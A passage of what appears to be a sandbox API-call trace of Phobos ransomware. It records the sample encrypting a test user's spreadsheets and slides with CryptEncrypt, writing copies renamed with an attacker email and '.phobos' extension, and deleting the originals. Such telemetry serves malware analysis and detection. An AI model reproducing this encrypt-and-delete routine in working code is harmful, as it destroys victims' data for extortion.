dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.040] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.040] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\1X6Tb_ump.xlsx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\1x6tb_ump.xlsx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0197.042] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0197.042] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.042] ReadFile (in: hFile=0x15c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x91db, lpOverlapped=0x0) returned 1 [0197.043] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x91e0, dwBufLen=0x91e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x91e0) returned 1 [0197.043] WriteFile (in: hFile=0xac, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x91e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x91e0, lpOverlapped=0x0) returned 1 [0197.045] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0197.045] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.045] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0197.045] CryptDestroyKey (hKey=0xa32be8) returned 1 [0197.045] WriteFile (in: hFile=0xac, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0197.045] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0197.045] CloseHandle (hObject=0x15c) returned 1 [0197.045] CloseHandle (hObject=0xac) returned 1 [0197.045] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\1X6Tb_ump.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\1x6tb_ump.xlsx")) returned 1 [0197.046] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0197.046] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\AtpNnEA42Ofil.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\atpnnea42ofil.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0197.047] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=97907) returned 1 [0197.047] CloseHandle (hObject=0xac) returned 1 [0197.047] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\AtpNnEA42Ofil.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\atpnnea42ofil.ods")) returned 0x20 [0197.047] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\AtpNnEA42Ofil.ods.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\atpnnea42ofil.ods.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.047] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\AtpNnEA42Ofil.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\atpnnea42ofil.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0197.047] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.047] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.047] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\AtpNnEA42Ofil.ods.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\atpnnea42ofil.ods.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0197.048] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0197.048] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.048] ReadFile (in: hFile=0xac, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x17e73, lpOverlapped=0x0) returned 1 [0197.050] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x17e80, dwBufLen=0x17e80 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x17e80) returned 1 [0197.051] WriteFile (in: hFile=0x15c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x17e80, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x17e80, lpOverlapped=0x0) returned 1 [0197.053] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0197.053] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.053] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0197.053] CryptDestroyKey (hKey=0xa32be8) returned 1 [0197.053] WriteFile (in: hFile=0x15c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0197.053] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0197.053] CloseHandle (hObject=0xac) returned 1 [0197.053] CloseHandle (hObject=0x15c) returned 1 [0197.053] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\AtpNnEA42Ofil.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\atpnnea42ofil.ods")) returned 1 [0197.055] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0197.055] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\M3UR.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\m3ur.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0197.056] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=74710) returned 1 [0197.056] CloseHandle (hObject=0x15c) returned 1 [0197.056] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\M3UR.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\m3ur.xls")) returned 0x20 [0197.056] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\M3UR.xls.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\m3ur.xls.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.056] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\M3UR.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\m3ur.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0197.056] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.056] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.056] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\M3UR.xls.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\m3ur.xls.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0197.057] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0197.057] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.057] ReadFile (in: hFile=0x15c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x123d6, lpOverlapped=0x0) returned 1 [0197.058] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x123e0, dwBufLen=0x123e0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x123e0) returned 1 [0197.059] WriteFile (in: hFile=0xac, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x123e0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x123e0, lpOverlapped=0x0) returned 1 [0197.061] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0197.061] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.061] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0197.061] CryptDestroyKey (hKey=0xa32be8) returned 1 [0197.061] WriteFile (in: hFile=0xac, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0197.062] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0197.062] CloseHandle (hObject=0x15c) returned 1 [0197.062] CloseHandle (hObject=0xac) returned 1 [0197.062] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\M3UR.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\m3ur.xls")) returned 1 [0197.063] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0197.063] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\s3by04Y2.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\s3by04y2.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0197.064] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=8796) returned 1 [0197.064] CloseHandle (hObject=0xac) returned 1 [0197.064] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\s3by04Y2.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\s3by04y2.ods")) returned 0x20 [0197.064] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\s3by04Y2.ods.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\s3by04y2.ods.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\s3by04Y2.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\s3by04y2.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0197.064] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.064] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\s3by04Y2.ods.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\s3by04y2.ods.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0197.065] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0197.065] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.065] ReadFile (in: hFile=0xac, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x225c, lpOverlapped=0x0) returned 1 [0197.128] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2260, dwBufLen=0x2260 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2260) returned 1 [0197.128] WriteFile (in: hFile=0x15c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2260, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2260, lpOverlapped=0x0) returned 1 [0197.129] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa329e8) returned 1 [0197.130] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.130] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0197.130] CryptDestroyKey (hKey=0xa329e8) returned 1 [0197.130] WriteFile (in: hFile=0x15c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0197.130] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0197.130] CloseHandle (hObject=0xac) returned 1 [0197.130] CloseHandle (hObject=0x15c) returned 1 [0197.130] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\s3by04Y2.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\s3by04y2.ods")) returned 1 [0197.131] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0197.131] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\sM5nqK2Lu kC\\shXqFUpet9xNiuLj.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\sm5nqk2lu kc\\shxqfupet9xniulj.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.300] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=26729) returned 1 [0197.300] CloseHandle (hObject=0x140) returned 1 [0197.300] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\sM5nqK2Lu kC\\shXqFUpet9xNiuLj.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\sm5nqk2lu kc\\shxqfupet9xniulj.ods")) returned 0x20 [0197.300] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\sM5nqK2Lu kC\\shXqFUpet9xNiuLj.ods.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\sm5nqk2lu kc\\shxqfupet9xniulj.ods.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\sM5nqK2Lu kC\\shXqFUpet9xNiuLj.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\sm5nqk2lu kc\\shxqfupet9xniulj.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.300] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.300] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0197.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\sM5nqK2Lu kC\\shXqFUpet9xNiuLj.ods.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\sm5nqk2lu kc\\shxqfupet9xniulj.ods.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.302] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32aa8) returned 1 [0197.302] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.302] ReadFile (in: hFile=0x140, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x6869, lpOverlapped=0x0) returned 1 [0197.303] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x6870, dwBufLen=0x6870 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x6870) returned 1 [0197.303] WriteFile (in: hFile=0x170, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x6870, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x6870, lpOverlapped=0x0) returned 1 [0197.304] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa329e8) returned 1 [0197.304] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0197.304] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0197.304] CryptDestroyKey (hKey=0xa329e8) returned 1 [0197.304] WriteFile (in: hFile=0x170, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0197.304] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0197.304] CloseHandle (hObject=0x140) returned 1 [0197.304] CloseHandle (hObject=0x170) returned 1 [0197.304] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\sM5nqK2Lu kC\\shXqFUpet9xNiuLj.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\sm5nqk2lu kc\\shxqfupet9xniulj.ods")) returned 1 [0197.305] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0197.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\sM5nqK2Lu kC\\yMVikYj-9s01azpDh.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\sm5nqk2lu kc\\ymvikyj-9s01azpdh.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0197.307] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=25391) returned 1 [0197.307] CloseHandle (hObject=0x170) returned 1 [0197.307] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\sM5nqK2Lu kC\\yMVikYj-9s01azpDh.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\sm5nqk2lu kc\\ymvikyj-9s01azpdh.ppt")) returned 0x20 [0197.307] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\sM5nqK2Lu kC\\yMVikYj-9s01azpDh.ppt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lihhdr8pcnpvbxcf0wor\\sm5nqk2lu kc\\ymvikyj-9s01azpdh.ppt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lihhDR8PcnPVBXcF0WOr\\sM5nqK2Lu kC\\yMVikYj-9s01azpDh.ppt" (normalized: "c:\\users\\5p5nrgjn0js 